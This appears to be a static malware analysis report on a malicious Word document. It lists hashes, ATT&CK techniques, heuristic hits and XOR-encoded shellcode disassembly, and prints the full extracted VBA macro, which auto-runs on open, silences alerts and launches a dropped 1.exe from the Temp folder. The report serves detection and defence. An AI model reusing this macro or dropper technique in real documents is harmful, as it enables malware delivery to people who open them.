Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f53dca35a2cdb70f…

MALICIOUS

Office (OLE)

Size: 193.9 KB
Created: 2018-03-21 11:47:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: ca1c41142ba9527d0d2c27a4687a0061
SHA-1: 1440bf5c15c76462d1dafe1b71ce2404cfbb0333
SHA-256: f53dca35a2cdb70f11dee9ad7f951de0eb6e9d2f1bcb4bb12450e6f1ae2c33a4
Risk Score: 478

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes a file named '1.exe' from the user's temporary directory using the Shell() function. This is further supported by heuristics indicating the presence of VBA macros, a Document_Open macro, and a Shell() call. The Ole10Native package also indicates that an executable payload is dropped.

Heuristics 14

  • Office EPRINT stream contains EMF object (severity: high, CVE related; rule OLE_EPRINT_EMF_OBJECT)
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and, when paired with exploit-payload anomalies, is evidence of Office object delivery; however, the malformed graphics record needed for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Dropper.Agent-6520359-0 (severity: critical; rule CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520359-0
  • XOR-encoded strings, key 0xDC (severity: critical; rule SC_XOR_ENCODED)
    Found 3 Windows library/API name(s) XOR-encoded with the single-byte key 0xDC: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    x86 disassembly · validity: uncertain (0.593) — no internal branches to corroborate control flow
    000189FF  90                nop
    00018A00  b3bd              mov bl, 0xbd
    00018A02  b890b5beae        mov eax, 0xaebeb590
    00018A07  bdaea59ddc        mov ebp, 0xdc9da5ae
    00018A0C  5f                pop edi
    00018A0D  1cdf              sbb al, 0xdf
    00018A0F  55                push ebp
    00018A10  59                pop ecx
    00018A11  c02323            shl byte ptr [ebx], 0x23
    00018A14  23845759c02323    and eax, dword ptr [edi + edx*2 + 0x2323c059]
    00018A1B  238c57912c8d23    and ecx, dword ptr [edi + edx*2 + 0x238d2c91]
    00018A22  8900              mov dword ptr [eax], eax
    00018A24  55                push ebp
    00018A25  59                pop ecx
    00018A26  e423              in al, 0x23
    00018A28  2323              and esp, dword ptr [ebx]
    00018A2A  8c                .byte 0x8c
    00018A2B  34dc              xor al, 0xdc
    00018A2D  dc                .byte 0xdc
    00018A2E  dc                .byte 0xdc
    00018A2F  dc8437d18ab5ae    fadd qword ptr [edi + esi - 0x514a752f]
    00018A36  a8a9              test al, 0xa9
    00018A38  bdb09db0b0        mov ebp, 0xb0b09db0
    00018A3D  b3bf              mov bl, 0xbf
    00018A3F  dc5f1c            fcomp qword ptr [edi + 0x1c]
    00018A42  df5559            fist word ptr [ebp + 0x59]
    00018A45  e023              loopne 0x18a6a
    00018A47  2323              and esp, dword ptr [ebx]
    00018A49  845749            test byte ptr [edi + 0x49], dl
    00018A4C  e023              loopne 0x18a71
    00018A4E  2323              and esp, dword ptr [ebx]
    00018A50  8e5799            mov ss, word ptr [edi - 0x67]
    00018A53  2c8c              sub al, 0x8c
    00018A55  238900559960      and ecx, dword ptr [ecx + 0x60995500]
    00018A5B  8c                .byte 0x8c
    00018A5C  34dc              xor al, 0xdc
    00018A5E  dc                .byte 0xdc
  • Ole10Native package drops an auto-executable payload (severity: critical; rule OFFICE_PACKAGE_RISKY_FILE)
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected (severity: medium; 3 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA (severity: critical; rule OLE_VBA_SHELL)
    Matched line in script:
    Shell Environ("Temp") & "\1.exe", vbNormal
  • Document_Open macro (severity: low; rule OLE_VBA_DOCOPEN)
    Matched line in script:
    Private Sub Document_Open()
  • Environ() call (env variable access) (severity: low; rule OLE_VBA_ENVIRON)
    Matched line in script:
    Shell Environ("Temp") & "\1.exe", vbNormal
  • Reference to ShellExecute API (severity: high; rule SC_STR_SHELLEXEC)
  • Reference to LoadLibrary API (severity: high; rule SC_STR_LOADLIBRARY)
  • Reference to GetProcAddress API (severity: high; rule SC_STR_GETPROCADDRESS)
  • Reference to VirtualAlloc API (severity: medium; rule SC_STR_VIRTUALALLOC)
  • Reference to VirtualProtect API (severity: medium; rule SC_STR_VIRTUALPROTECT)
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 998 bytes
SHA-256: c12dfeabe214ff474a91c1288da04b5dbbbf9dfa62a7c418199529b14224ece5

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    ' Auto-executes when the document is opened; errors and prompts are suppressed
    On Error Resume Next
    Application.DisplayAlerts = False
    Dim Str As String

    ' Moves the selection within the document body and copies the selected text
    Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveRight Unit:=wdCharacter, Count:=13
    Selection.TypeBackspace
    Selection.Copy

    ' Launches the dropped payload 1.exe from the user's %TEMP% directory
    Shell Environ("Temp") & "\1.exe", vbNormal
    Selection.TypeBackspace

    ' Overwrites the clipboard with a blank string and moves the selection back
    Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

    ' Re-saves the document in place as an XML (.docx) document
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
End Sub

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: ObjectPool/_1584451364/Ole10Native
Size: 92427 bytes
SHA-256: 3c7c43b9162c792145de0ff6ce32882d97f67d53ffcfb9e6259d6218589f4962

Filename: ole10native_00_1.exe
Kind: ole-package-payload
Source: OLE Ole10Native payload: ObjectPool/_1584451364/Ole10Native; display_name=1.exe; full_path=C:\Users\win7home\AppData\Local\Temp\1.exe; temp_path=; def_file=
Size: 92160 bytes
SHA-256: a5d2845db495d379769c4039941098be46ecd8e85e4c23bfe8f44ad466840927